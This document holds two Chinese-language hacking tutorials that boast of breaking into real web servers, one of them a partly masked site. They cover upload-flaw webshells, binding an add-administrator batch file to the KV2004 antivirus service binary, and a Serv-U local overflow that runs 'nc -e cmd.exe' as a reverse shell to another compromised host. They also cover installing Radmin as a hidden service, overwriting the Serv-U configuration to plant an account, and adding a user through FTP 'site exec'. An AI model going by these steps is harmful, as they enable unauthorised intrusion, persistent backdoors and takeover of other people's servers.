巧用asp木马和KV2004得到管理员权限

重来没写过什么文章，这是第一次，写的不好请大家原谅，高手也不要取笑哦。这里也没什么技术可言，只是我这个菜鸟的一点心得，ok开始。。。
前段时间动网的UPfile.asp漏洞可谓闹的沸沸扬扬，这个漏洞确实很厉害，相信不少新手和我一样种了不少后门在有动网的网站上，但是asp木马的权限确实很底，除了删点文章，删点图片好象没什么用了。不行不得到管理员权限简直就辜负了发现这个漏洞的高手们~v~。好，想办法提升权限，我找啊找！网上提升权限的方法几乎都用过了，都没什么用，补丁打的很全啊！接下来用findpass想解开管理员的密码，又失败，findpass要管理员权限才有用。用pslist看看晕装的是瑞星+天网，网上的大部分工具遇上这个防御组合一般都没用了。种木马？不行一来
权限太底，二来在瑞星杀天网堵的包围下很少能活出来的。做个添加用户权限的bat文件想放到启动组中去，这个方法虽然有点傻但是有一定的可行性，晕又是权限不够加不进去。c盘下的"Program Files" "winnt" "Documents and Settings"三个文件甲都没有写权限，更不要说注册表了。郁闷了，给管理员留了句话，然后匆匆下线。
第2天上来一看，嘿嘿图被改回来了，管理员应该发现了，这次更不容易得手。登上asp木马进去看了一下，昨天传上去的几个exe被删了，还好asp木马活下来了，咦！c盘多了文件甲叫KV2004，原来管理员把瑞星卸了，安了个kv2004，进Program Files看看确实瑞星被卸了。（这里说一下，大部分的杀毒软件默认的安装路径c:\\Program Files\\,但是kv默认的安装路径是c:\\kv2004\\）到这里机会就来了我们可以把执行文件捆绑在kv2004上，跟随kv一起启动。因为kv不在"Program Files" "winnt" "Documents and Settings"这三个文件甲中，很大可能我可以修改

或者上传文件。行动！在kv2004下随便找个htm文件删除：(看看有无写删权限）
C:\\>del c:\\kv2004\\GetLicense.htm
拒绝访问

奇怪了，再来看看文件甲属性
C:\\>attrib c:\\kv2004
S R C:\\KV2004

哦是只读。
C:\\>attrib -r -s c:\\kv2004

ok！在试试
C:\\>del c:\\kv2004\\GetLicense.htm

成功了！好写个起用帐号和提升权限的bat文件，然后把bat文件和kv2004的系统服务文件KVSrvXP.exe捆绑起来，（注意多下种捆绑器，捆绑一

次用kv2004来扫描一次，因为很多捆绑器生成的文件kv会把他作为病毒来处理掉）准备上传了，先删掉原来的KVSrvXP.exe。
C:\\>del c:\\kv2004\\KVSrvXP.exe
拒绝访问

可能是KVSrvXP.exe被windows调用中，删不掉。没办法了吗？不，删不掉我改名
C:\\>ren c:\\kv2004\\KVSrvXP.exe kv.exe

OK!然后用asp木马把修改了的KVSrvXP.exe上传到kv2004中，接下来就去睡觉把。
4个小时后登上来用：
net user 起用的帐户

已经在administrators组中，接下来要关防火墙，关杀毒软件，还是种木马你随便我了，哈哈！
我觉得入侵没什么固定的模式，具体情况具体分析，杀毒软件同样也可以帮我们忙，这里我只提供了一种思路。请大家指教。

如何绕过防火墙提升权限

本文讲的重点是webshell权限的提升和绕过防火墙，高手勿笑。

废话少说，咱们进入正题。

首先确定一下目标：http://www.sun***.com ，常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell，不是DVBBS，而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp，用过动鲨的door.exe的人都知道，这个是上传asp木马内容的。于是，上传海洋2005a，成功获得webshell。

测试一下权限，在cmd里运行set，获得主机一些信息，系统盘是D盘，也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢？难道是双系统？浏览后发现没有什么系统文件，只有一些垃圾文件，晕死。没关系，再来检查一下，虚拟主机都有serv-u的，这台也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。

思路：上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用（反正我总遇到这个问题），没关系，用rain改的一个无组件上传，一共有3个文件，up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹，up.htm是本地用的，修改up.htm里的链接地址为：http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H:\\long\\sun***\\lemon（网站目录）后，发现没有运行权限。没关系，根据经验，一般系统下D:\\Documents and Settings\\All Users\\是应该有运行权限的。于是想把文件copy过去，但是发现我们的webshell没有对D盘写的权限，晕死。

可以浏览D:\\program files\\serv-u\\ServUDaemon.ini,不能改，难道要破解serv-u的密码，晕，不想。

不可以这么就泄气了，我突然想到为什么系统不放在C盘了，难道C盘是FAT32分区的？（后来证明了我们的想法。这里说一下，如果主机有win98的系统盘，那里99%是FAT32分区的。我们还遇到过装有Ghost的主机，为了方便在DOS下备份，它的备份盘一般都是FAT分区的。）如果系统盘是FAT32分区，则网站就没有什么安全性可言了。虽然C盘不是系统盘，但是我们有执行权限。呵呵，copy srv.exe和nc.exe到c:\\，运行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡，在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里，没有公网ip，不爽-ing。

我们成功获得一个系统shell连上肉鸡。（看起来简单，其实这里我们也遇到过挫折，我们发现有些版本的nc居然没有-e这个参数，还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功，会出现乱码，没办法用。为此，上传n次，错误n次，傻了n次，后来终于成功了。做黑客还真得有耐心和恒心。）

高兴之余，我们仍不满足，因为这个shell实在是太慢了。于是，想用我们最常用的Radmin，其实管理员一按Alt+Ctrl+Del，看进程就能发现r_server了，但是还是喜欢用它，是因为不会被查杀。好了，上传admdll.dll，raddrv.dll，r_server.exe到H:\\long\\sun***\\lemon，再用刚才nc得到的shell把它们copy到d:\\winnt\\system32\\下，分别运行：r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待，终于显示成功了。兴冲冲用radmin连上去，发现连接失败。晕死，忘了有防火墙了。上传pslist和pskill上去，发现有backice，木马克星等。Kill掉他们虽然可以登陆，但服务器重启后还是不行，终不是长久之计呀。防火墙是不防21，80等端口的，于是，我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来，覆盖本机的ServUDaemon.ini，在本机的serv-u上添加一个用户名为xr，密码为rain的系统帐号，加上所有权限。再用老办法，上传，用shell写入D:\\program files\\serv-u\\里，覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间，但是成功了，于是用flashfxp连上，发生530错误。郁闷，怎么又失败了。（根据经验这样应该就可以了，但为什么不行没有想通，请高手指点。）

不管了，我们重启serv-u就ok了，怎么重启呢，开始想用shutdown重启系统，但那样我们就失去了nc这个shell，还可能被发现。后来，眼睛一亮，我们不是有pskill吗？刚才用pslist发现有这个进程：ServUDaemon 。把它kill了。然后再运行D:\\program files\\serv-u\\ ServUAdmin.exe ，这里要注意不是ServUDaemon.exe 。

好了，到这里，我们直接ftp上去吧，ls一下，哈哈，系统盘在我的掌握下。我们能不能运行系统命令呢？是可以的，这样就可以：

ftp>quote site exec net user xr rain /add

在webshell上运行net user，就可以看见添加成功了。

整个入侵渗透到这就结束了，在一阵后清理打扫后。我们就开始讨论了。其实，突破防火墙有很多好的rootkit可以做到的，但是我们觉得系统自带的服务才是最安全的后门。

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] 下一页